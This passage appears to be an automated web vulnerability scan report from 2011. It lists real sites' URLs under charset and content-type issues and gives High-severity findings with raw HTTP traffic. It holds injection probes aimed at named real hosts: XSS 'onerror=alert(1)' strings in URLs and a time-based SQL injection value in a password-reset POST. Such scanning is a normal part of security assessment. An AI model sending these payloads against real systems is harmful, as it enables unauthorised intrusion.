27.22. http://tours.sapha.com/
27.23. http://www.expedia.com/pub/agent.dll
27.24. http://www.expedia.com/pub/agent.dll
27.25. http://www.expedia.com/pub/agent.dll
27.26. http://www.expedia.com/pub/agent.dll
27.27. http://www.expedia.com/pub/agent.dll
27.28. http://www.expedia.com/pub/agent.dll
27.29. http://www.expedia.com/pub/agent.dll
27.30. http://www.expedia.com/pub/agent.dll
27.31. http://www.expedia.com/pub/agent.dll
27.32. https://www.expedia.com/pub/agent.dll
27.33. https://www.expedia.com/pub/agent.dll
27.34. https://www.expedia.com/pub/agent.dll
27.35. https://www.expedia.com/pub/agent.dll
27.36. https://www.expedia.com/pub/agent.dll
27.37. https://www.expedia.com/pub/agent.dll
27.38. https://www.expedia.com/pub/agent.dll
27.39. http://www.millerwelds.com/favicon.ico
27.40. http://www.millerwelds.com/financing/images/darkhead_min.png
27.41. http://www.millerwelds.com/financing/images/lighthead_min.png
27.42. http://www.millerwelds.com/financing/images/plinenavbody_min.png
27.43. http://www.millerwelds.com/financing/images/plinenavfoot_min.png
27.44. http://www.millerwelds.com/financing/images/plinenavhead_min.png
27.45. http://www.millerwelds.com/financing/images/powerline_bg.png
27.46. http://www.millerwelds.com/financing/images/powerline_head.png
27.47. http://www.millerwelds.com/images/footer-social-sprite.jpg
27.48. http://www.millerwelds.com/images/go-search.jpg
27.49. http://www.millerwelds.com/images/logo_printable.gif
27.50. http://www.millerwelds.com/images/nav-new/aboutus.gif
27.51. http://www.millerwelds.com/images/nav-new/blog.gif
27.52. http://www.millerwelds.com/images/nav-new/forums.gif
27.53. http://www.millerwelds.com/images/nav-new/indust_interests.gif
27.54. http://www.millerwelds.com/images/nav-new/powerclick01.gif
27.55. http://www.millerwelds.com/images/nav-new/products.gif
27.56. http://www.millerwelds.com/images/nav-new/resources.gif
27.57. http://www.millerwelds.com/images/nav-new/service.gif
27.58. http://www.millerwelds.com/images/nav-new/wheretobuy.gif
27.59. http://www.millerwelds.com/images/navicons.png
28.1. http://381-kpd-482.mktoresp.com/webevents/visitWebPage
28.2. http://4qinvite.4q.iperceptions.com/1.aspx
28.3. http://797-pwy-691.mktoresp.com/webevents/visitWebPage
28.4. http://ab158636.servedbyadbutler.com/adserve/
28.5. http://about-tagged.com/
28.6. http://action.mathtag.com/mm/rtb/COFC/1008A2/imp
28.7. http://ad.doubleclick.net/adj/scmag.hmktus/sc
28.8. http://admin.instantservice.com/resources/smartbutton/5371/II_Servers.js
28.9. http://ads.allatsea.net/www/delivery/spcjs.php
28.10. http://adsfac.us/ag.asp
28.12. http://altfarm.mediaplex.com/ad/js/16228-124632-16454-0
28.13. http://api.facebook.com/restserver.php
28.14. http://apps.sapha.com/appshandler.php
28.15. http://as.casalemedia.com/j
28.16. http://b.rad.msn.com/ADSAdClient31.dll
28.17. http://b.voicefive.com/b
28.18. http://bidder.mathtag.com/iframe/notify
28.19. https://broker.gotoassist.com/h/lbmc
28.20. http://c5.zedo.com/jsc/c5/ff2.html
28.21. http://c7.zedo.com/bar/v16-406/c5/jsc/gl.js
28.22. http://clients1.google.com/webpagethumbnail
28.23. http://d.xp1.ru4.com/activity
28.24. http://dce.sapha.com/engine.php
28.26. http://domains.googlesyndication.com/apps/domainpark/domainpark.cgi
28.27. http://expedia-www.baynote.net/baynote/tags3/common
28.29. http://fls.doubleclick.net/activityi
28.30. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
28.31. http://googleads.g.doubleclick.net/pagead/ads
28.33. http://help.tagged.com/
28.34. http://img.mediaplex.com/content/0/16228/124632/728x90_Patch.js
28.35. http://int.teracent.net/tase/int
28.36. http://integration.delivra.com/tracking/default.aspx
28.37. http://jlinks.industrybrains.com/jsct
28.38. http://l.addthiscdn.com/live/t00/250lo.gif
28.39. http://microsoftsto.112.2o7.net/b/ss/msstoohelpall/1/H.20.3/s67880538937170
28.40. https://mosaicsecurity.com/products/1919-pci-scan-annual
28.42. http://now.eloqua.com/visitor/v200/svrGP.aspx
28.43. http://om.expedia.com/b/ss/expedia1/1/G.9p2/s91449721802491
28.44. http://p.addthis.com/pixel
28.45. http://player.ooyala.com/player.js
28.46. http://poll.websitegear.com/compactpoll.asp
28.47. http://search.twitter.com/search.json
28.48. http://segment-pixel.invitemedia.com/pixel
28.50. http://tours.sapha.com/
28.51. http://va.px.invitemedia.com/pixel
28.52. https://verify.authorize.net/anetseal/
28.53. http://widgets.digg.com/buttons/count
28.54. http://www.eneighborhoods.com/
28.55. http://www.expedia.com/daily/styles/3ColFlex1024.css
28.56. https://www.expedia.com/pub/agent.dll
28.58. http://www.lbmc.com/landing/pci.htm
28.59. http://www.millerwelds.com/financing/index.php
28.60. http://www.nextadvisor.com/includes/javascript.php
28.61. http://www.resiteonline.com/
28.62. http://www.socialfollow.com/button/image/
29.1. https://broker.gotoassist.com/javaScriptTester.tmpl
29.2. https://mosaicsecurity.com/products/1919-pci-scan-annual
29.3. https://myaccount.nytimes.com/gst/forgot
29.4. https://subscribe.haymarketmedia.com/scm/
29.5. https://subscribe.haymarketmedia.com/subscribe/CCI_Custserve.aspx
29.6. https://www.expedia.com/pub/agent.dll
29.7. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
29.8. https://www.taxnotebook.com/CopyRightTN.htm
30. HTML does not specify charset
30.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
30.2. http://480-adver-view.c3metrics.com/v.js
30.3. http://ab158636.servedbyadbutler.com/adserve/
30.4. http://ad.doubleclick.net/adi/N4538.132530.MICROSOFTONLINEINC1/B2304017.8
30.5. http://ad.yieldmanager.com/iframe3
30.6. http://bidder.mathtag.com/iframe/notify
30.7. http://c5.zedo.com/jsc/c5/ff2.html
30.8. http://creative.adonion.com/2_4092.html
30.9. http://fls.doubleclick.net/activityi
30.10. http://freeconferencing.liveoffice.com/conferenceonline/scripts/putclicktocall.js
30.12. http://hmficweb.hinghammutual.com/billing_view/
30.13. http://hmficweb.hinghammutual.com/billing_view/PaymentDetails.asp
30.14. http://hmficweb.hinghammutual.com/billing_view/login.asp
30.15. http://hmficweb.hinghammutual.com/css/
30.16. http://hmficweb.hinghammutual.com/images/
30.17. http://hmficweb.hinghammutual.com/images/content/
30.18. http://hmficweb.hinghammutual.com/images/content/login/
30.19. http://hmficweb.hinghammutual.com/images/home/
30.20. http://hmficweb.hinghammutual.com/includes/
30.21. http://iv.doubleclick.net/adi/nbcu.lim.har/pid_ap_news-politics-article
30.23. http://kroogy.com/favicon.ico
30.24. http://kroogy.com/pub/banner_160_600.php
30.25. http://kroogy.com/pub/banner_728_90.php
30.26. http://kroogy.com/pub/banner_728_90_random.php
30.27. http://kroogy.com/pub15bf1%3Cimg%20src%3da%20onerror%3dalert(1)%3Ec26cf5636dc/a
30.28. http://kroogy.com/search/web19465%3Cimg%20src%3da%20onerror%3dalert(1)%3E7fccbdccd2f/a
30.30. http://kroogy.com/searchc3d36%3Cimg%20src%3da%20onerror%3dalert(1)%3E1f123855a7/web/a
30.31. http://lbmc.imonitor.net/
30.32. http://login.vindicosuite.com/AccountManager/ResetPassword/Exec_Reset.asp
30.33. http://login.vindicosuite.com/AccountManager/ResetPassword/index.asp
30.34. http://login.vindicosuite.com/vindico_dynamic.asp
30.35. http://now.eloqua.com/visitor/v200/svrGP.aspx
30.36. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
30.37. http://store.kentuckyderby.com/cart.php
30.38. http://tags.bluekai.com/site/2576
30.39. http://www.advisorsquare.com/useradmin/Authenticate.asp
30.40. http://www.caribbean-ocean.com/
30.41. http://www.caribbean-ocean.com/accommodation2.php
30.42. http://www.caribbean-ocean.com/index.php
30.43. http://www.caribbean-ocean.com/index.php/1'
30.44. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91
30.45. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105
30.46. http://www.caribbean-ocean.com/styles.css
30.47. http://www.caribbean-ocean.com/tabs.js
30.48. http://www.eneighborhoods.com/favicon.ico
30.49. http://www.eneighborhoods.com/menu/homepage/menu.css
30.50. http://www.eneighborhoods.com/menu/menu.css
30.51. http://www.eneighborhoods.com/menu/mm_css_menu.js
30.52. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
30.53. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
30.54. http://www.ezflexplan.com/ContentPages/employers.html
30.55. http://www.ezflexplan.com/ContentPages/er_admintls.html
30.56. http://www.ezflexplan.com/ContentPages/er_enrllmnttools.html
30.57. http://www.ezflexplan.com/ContentPages/er_htsuap.html
30.58. http://www.ezflexplan.com/ContentPages/nav_employers.html
30.59. http://www.ezflexplan.com/navigation/frameset.asp
30.60. http://www.ezflexplan.com/navigation/menu.asp
30.61. http://www.gofileroom.com/SessionRelease.asp
30.62. http://www.gofileroom.com/lbmc/
30.63. https://www.gofileroom.com/lbmc/Default.asp
30.64. http://www.hunton.com/FCWSite/Features/_xpress/
30.65. http://www.nextadvisor.com/includes/javascript.php
30.66. http://www.nutter.com/attorneys.php
30.67. http://www.nutter.com/careers.php
30.68. http://www.nutter.com/home.php
30.69. http://www.socialfollow.com/button/image/
30.70. http://www.socialfollow.com/js/flash-detect.js
30.71. http://www.socialfollow.com/js/jquery.js
30.72. http://www.socialfollow.com/js/thickbox.js
30.73. http://www.socialfollow.com/js/validator.js
30.74. https://www.taxnotebook.com/CopyRightTN.htm
31. HTML uses unrecognised charset
31.1. http://www.advisorsquare.com/new/asle05/content.asp
31.2. http://www.horseracingnation.com/polls/current/kentucky_derby_2011_contenders
31.3. http://www.horseracingnation.com/probables/probables.aspx
32. Content type incorrectly stated
32.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php
32.2. http://480-adver-view.c3metrics.com/v.js
32.3. http://a1.twimg.com/profile_images/258292367/av-2_normal.gif
32.4. http://a2.twimg.com/profile_images/58727890/PIA08370_normal.png
32.6. http://about-tagged.com/wp-content/themes/wptagged/favicon.ico
32.7. http://allatsea.net/assets/social/find_us_on_facebook.png
32.8. http://b.rad.msn.com/ADSAdClient31.dll
32.9. https://broker.gotoassist.com/javaScriptTester.tmpl
32.10. http://dce.sapha.com/engine.php
32.11. http://expedia-www.baynote.net/baynote/tags3/common
32.12. http://fpdownload2.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
32.13. http://hmficweb.hinghammutual.com/images/leftcolumn/photo-agents.jpg
32.14. http://learn.bridgefront.com/favicon.ico
32.15. http://media.expedia.com/media/content/expus/graphics/home/wiz/wizard_booking_image.gif
32.16. http://now.eloqua.com/visitor/v200/svrGP.aspx
32.17. http://poll.websitegear.com/compactpoll.asp
32.18. http://sales.liveperson.net/hcp/html/mTag.js
32.19. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
32.20. http://store.kentuckyderby.com/cart.php
32.21. http://store.kentuckyderby.com/favicon.ico
32.22. http://support.expedia.com/ci/ajaxRequest/getReportData
32.23. https://verify.authorize.net/anetseal/images/secure90x72.gif
32.24. http://www.advisorsquare.com/design_gallery/welcome/HP_pict1.jpg
32.25. http://www.advisorsquare.com/design_gallery/welcome/HP_pict2.jpg
32.26. http://www.advisorsquare.com/design_gallery/welcome/HP_pict3.jpg
32.27. http://www.advisorsquare.com/design_gallery/welcome/HP_pict4.jpg
32.28. http://www.advisorsquare.com/new/AccountantSquareDemo/tax_calendar.jpg
32.29. http://www.advisorsquare.com/new/BrochureLevel/GA15_banner.jpg
32.30. http://www.advisorsquare.com/new/BrochureLevel/HP_pict2.jpg
32.31. http://www.advisorsquare.com/new/BrochureLevel/HP_pict3.jpg
32.32. http://www.advisorsquare.com/new/BrochureLevel/HP_welcomePhoto.jpg
32.33. http://www.advisorsquare.com/new/BusinessLevel/FA09Banner.jpg
32.34. http://www.advisorsquare.com/new/BusinessLevel/HP_pict1.jpg
32.35. http://www.advisorsquare.com/new/BusinessLevel/HP_pict2.jpg
32.36. http://www.advisorsquare.com/new/BusinessLevel/HP_pict3.jpg
32.37. http://www.advisorsquare.com/new/BusinessLevel/HP_pict4.jpg
32.38. http://www.advisorsquare.com/new/PremiumLevel/FA03Banner.jpg
32.39. http://www.advisorsquare.com/new/PremiumLevel/HP_pict3.jpg
32.40. http://www.advisorsquare.com/new/PremiumLevel/HP_pict4.jpg
32.41. http://www.advisorsquare.com/new/PremiumLevel/leftframe.jpg
32.42. http://www.advisorsquare.com/new/asframeless02/Business02_asBanner.jpg
32.43. http://www.advisorsquare.com/new/asframeless02/banner_bus02.jpg
32.44. http://www.advisorsquare.com/new/asle04/L3company_pict1.jpg
32.45. http://www.advisorsquare.com/new/asle04/L3company_pict2.jpg
32.46. http://www.advisorsquare.com/new/asle04/L3links_pict1.jpg
32.47. http://www.advisorsquare.com/new/asle04/L3links_pict2.jpg
32.48. http://www.advisorsquare.com/new/asle04/L3products_pict1.jpg
32.49. http://www.advisorsquare.com/new/asle04/home_01.jpg
32.50. http://www.advisorsquare.com/new/asle04/home_02.jpg
32.51. http://www.advisorsquare.com/new/asle04/home_03.jpg
32.52. http://www.advisorsquare.com/new/asle04/place_banner.jpg
32.53. http://www.advisorsquare.com/new/asle05/HP_pict2.jpg
32.54. http://www.advisorsquare.com/new/asle05/asle05_banner.jpg
32.55. http://www.advisorsquare.com/new/asle05/menubg.jpg
32.56. http://www.caribbean-ocean.com/styles.css
32.57. http://www.caribbean-ocean.com/tabs.js
32.58. http://www.dhmiservices.com/ClickContact/js.ashx
32.59. http://www.dominionenterprises.com/site/scripts/qm_slide_effect.js
32.60. http://www.expedia.com/daily/js/flash.vbs
32.61. http://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
32.62. https://www.expedia.com/pubspec/scripts/isE3OnHtx.asp
32.63. http://www.horseracingnation.com/silks/horse/Ack_Ack
32.64. http://www.horseracingnation.com/silks/horse/Affirmed
32.65. http://www.horseracingnation.com/silks/horse/Ancient_Title
32.66. http://www.horseracingnation.com/silks/horse/Animal_Kingdom
32.67. http://www.horseracingnation.com/silks/horse/Archarcharch
32.68. http://www.horseracingnation.com/silks/horse/Armed
32.69. http://www.horseracingnation.com/silks/horse/Arts_And_Letters
32.70. http://www.horseracingnation.com/silks/horse/Assault
32.71. http://www.horseracingnation.com/silks/horse/Bold_Ruler
32.72. http://www.horseracingnation.com/silks/horse/Brilliant_Speed
32.73. http://www.horseracingnation.com/silks/horse/Buckpasser
32.74. http://www.horseracingnation.com/silks/horse/Carry_Back
32.75. http://www.horseracingnation.com/silks/horse/Citation
32.76. http://www.horseracingnation.com/silks/horse/Colin
32.77. http://www.horseracingnation.com/silks/horse/Comma_To_The_Top
32.78. http://www.horseracingnation.com/silks/horse/Cougar
32.79. http://www.horseracingnation.com/silks/horse/Count_Fleet
32.80. http://www.horseracingnation.com/silks/horse/Curlin
32.81. http://www.horseracingnation.com/silks/horse/Damascus
32.82. http://www.horseracingnation.com/silks/horse/Decisive_Moment
32.83. http://www.horseracingnation.com/silks/horse/Derby_Kitten
32.84. http://www.horseracingnation.com/silks/horse/Dialed_In
32.85. http://www.horseracingnation.com/silks/horse/Dr_Fager
32.86. http://www.horseracingnation.com/silks/horse/Equipoise
32.87. http://www.horseracingnation.com/silks/horse/Exceller
32.88. http://www.horseracingnation.com/silks/horse/Foolish_Pleasure
32.89. http://www.horseracingnation.com/silks/horse/Forego
32.90. http://www.horseracingnation.com/silks/horse/Fort_Marcy
32.91. http://www.horseracingnation.com/silks/horse/Gallant_Fox
32.92. http://www.horseracingnation.com/silks/horse/Gallant_Man
32.93. http://www.horseracingnation.com/silks/horse/Holy_Bull
32.94. http://www.horseracingnation.com/silks/horse/John_Henry
32.95. http://www.horseracingnation.com/silks/horse/Kelso
32.96. http://www.horseracingnation.com/silks/horse/Majestic_Prince
32.97. http://www.horseracingnation.com/silks/horse/Man_O_War
32.98. http://www.horseracingnation.com/silks/horse/Master_Of_Hounds
32.99. http://www.horseracingnation.com/silks/horse/Midnight_Interlude
32.100. http://www.horseracingnation.com/silks/horse/Mucho_Macho_Man
32.101. http://www.horseracingnation.com/silks/horse/Nashua_1
32.102. http://www.horseracingnation.com/silks/horse/Native_Dancer
32.103. http://www.horseracingnation.com/silks/horse/Native_Diver
32.104. http://www.horseracingnation.com/silks/horse/Nehro
32.105. http://www.horseracingnation.com/silks/horse/Northern_Dancer
32.106. http://www.horseracingnation.com/silks/horse/Omaha
32.107. http://www.horseracingnation.com/silks/horse/Pants_On_Fire
32.108. http://www.horseracingnation.com/silks/horse/Riva_Ridge
32.109. http://www.horseracingnation.com/silks/horse/Round_Table
32.110. http://www.horseracingnation.com/silks/horse/Ruffian
32.111. http://www.horseracingnation.com/silks/horse/Santiva
32.112. http://www.horseracingnation.com/silks/horse/Seabiscuit
32.113. http://www.horseracingnation.com/silks/horse/Seattle_Slew
32.114. http://www.horseracingnation.com/silks/horse/Secretariat
32.115. http://www.horseracingnation.com/silks/horse/Shackleford
32.116. http://www.horseracingnation.com/silks/horse/Soldat
32.117. http://www.horseracingnation.com/silks/horse/Spectacular_Bid
32.118. http://www.horseracingnation.com/silks/horse/Stay_Thirsty
32.119. http://www.horseracingnation.com/silks/horse/Sunday_Silence
32.120. http://www.horseracingnation.com/silks/horse/Swaps_1
32.121. http://www.horseracingnation.com/silks/horse/Sword_Dancer
32.122. http://www.horseracingnation.com/silks/horse/Sysonby
32.123. http://www.horseracingnation.com/silks/horse/Tom_Fool
32.124. http://www.horseracingnation.com/silks/horse/Twice_The_Appeal
32.125. http://www.horseracingnation.com/silks/horse/Twilight_Tear
32.126. http://www.horseracingnation.com/silks/horse/Twinspired
32.127. http://www.horseracingnation.com/silks/horse/Uncle_Mo
32.128. http://www.horseracingnation.com/silks/horse/Wajima
32.129. http://www.horseracingnation.com/silks/horse/War_Admiral
32.130. http://www.horseracingnation.com/silks/horse/Watch_Me_Go
32.131. http://www.horseracingnation.com/silks/horse/Whirlaway
32.132. http://www.horseracingnation.com/silks/horse/Zenyatta
32.133. http://www.lbmc.com/favicon.ico
32.134. http://www.lbmc.com/misc/favicon.ico
32.135. http://www.lbmc.com/sites/default/files/imagecache/profile-150x200/gherman.jpg
32.136. http://www.millerwelds.com/favicon.ico
32.137. http://www.nbcconnecticut.com/fonts/nobel_bold.ttf
32.138. http://www.nextadvisor.com/includes/javascript.php
32.139. http://www.socialfollow.com/button/image/
32.140. http://www.socialfollow.com/js/flash-detect.js
32.141. http://www.socialfollow.com/js/jquery.js
32.142. http://www.socialfollow.com/js/thickbox.js
32.143. http://www.socialfollow.com/js/validator.js
32.144. http://www.tagged.com/api/
32.145. http://www.tagged.com/favicon.ico
32.146. http://www2.sesamestats.com/paneltracking.aspx
33. Content type is not specified
33.1. http://ad.yieldmanager.com/st
33.2. http://www.expedia.com/static/default/default/images/close.gif
33.3. http://www.expedia.com/static/frog/v0.1a/images/iconSpritesT.png
33.4. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png
33.5. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png
33.6. http://www.expedia.com/static/fusion/v2.3/images/customersupport/flyout_arrow.png
33.7. http://www.expedia.com/static/fusion/v2.3/images/customersupport/lady78x78.gif
33.8. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png
33.9. http://www.expedia.com/static/fusion/v2.3/images/wizard/promo_bg.png
33.10. http://www.expedia.com/static/fusion/v2.3/images/wizard/wizard_out_bg.gif
33.11. http://www.socialfollow.com/button/image/
34.1. https://broker.gotoassist.com/
34.2. https://mosaicsecurity.com/
34.3. https://secure.trust-guard.com/
34.4. https://subscribe.haymarketmedia.com/
34.5. https://verify.authorize.net/
34.6. https://www.expedia.com/
34.7. https://www.gofileroom.com/
34.8. https://www.taxnotebook.com/
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:03:29 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | / |
GET / HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:56:06 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /ResetPassword.php |
POST /ResetPassword.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 Origin: https://secure.trust User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 Content-Length: 66 txtEmail=-111%27+OR+SLEEP |
HTTP/1.1 302 Found Date: Sat, 07 May 2011 01:20:55 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 200 Location: index.php P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:30:13 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://secure.trust |
Path: | /index.php |
GET /index.php HTTP/1.1 Host: secure.trust-guard.com Connection: keep-alive Referer: https://secure.trust Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=147269874 |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 01:12:23 GMT Server: Apache/2.2.3 (CentOS) Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR" Content-Length: 5008 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <script type="text/ja ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://www.hunton.com |
Path: | /aboutus/uniGC.aspx |
GET /aboutus/uniGC.aspx?xpST Host: www.hunton.com Proxy-Connection: keep-alive Referer: http://www.hunton.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Date: Sat, 07 May 2011 00:17:29 GMT Server: Microsoft-IIS/6.0 x-geoloc: 05 x-client: 000040 x-apptype: 01 x-prodtype: 01 x-public: 1 x-redirect: 0 x-occurrence: 01 x-server: EG-H1WS-A09 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: Language=7483b893-e478 Set-Cookie: DefaultCulture=en-US; path=/ Set-Cookie: Mode=1; path=/ Set-Cookie: EventingStatus=1; path=/ Set-Cookie: NavId=1844; path=/ Set-Cookie: PortletId=5981402; path=/ Set-Cookie: SiteId=1837; path=/ Set-Cookie: SERVER_PORT=80; path=/ Set-Cookie: Localization=TimeZone=0 Set-Cookie: ZoneId=7; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48748 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <tit ...[SNIP]... |
Severity: | High |
Confidence: | Tentative |
Host: | http://ads.allatsea.net |
Path: | /www/delivery/spc.php |
GET /www/delivery/spc.php Host: ads.allatsea.net Proxy-Connection: keep-alive Referer: http://allatsea.net/by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168508913 |
HTTP/1.1 200 OK Date: Fri, 06 May 2011 21:33:21 GMT Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch X-Powered-By: PHP/5.2.6-1+lenny10 Pragma: no-cache Cache-Control: private, max-age=0, no-cache Expires: Mon, 26 Jul 1997 05:00:00 GMT P3P: CP="CUR ADM OUR NOR STA NID" Set-Cookie: OAID=a9e7a0f4da4672b Content-Size: 6150 Content-Length: 6150 Content-Type: application/x-javascript; charset=UTF-8 var OA_output = new Array(); OA_output['zone_22_1'] = ''; OA_output['zone_22_1'] += "<"+"a href=\'http://ads OA_output['zone_22_2'] = ''; OA_output['zone_22_2'] += "<"+"span><"+"script type=\'text/javascript\'> OA_output['zone_22_2'] += "/* openads=http://ads OA_output['zone_22_2'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"> OA_output['zone_22_2'] += "google_ad_client = \"ca-pub-9585000347357330 OA_output['zone_22_2'] += "/* 125x125, created 3/14/10 */\n"; OA_output['zone_22_2'] += "google_ad_slot = \"8399079020\";\n"; OA_output['zone_22_2'] += "google_ad_width = 125;\n"; OA_output['zone_22_2'] += "google_ad_height = 125;\n"; OA_output['zone_22_2'] += "//-->\n"; OA_output['zone_22_2'] += "<"+"/script>\n"; OA_output['zone_22_2'] += "<"+"script type=\"text/javascript\" OA_output['zone_22_2'] += "src=\"http://pagead2 OA_output['zone_22_2'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea ...[SNIP]... |
GET /www/delivery/spc.php Host: ads.allatsea.net Proxy-Connection: keep-alive Referer: http://allatsea.net/by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=168508913 |
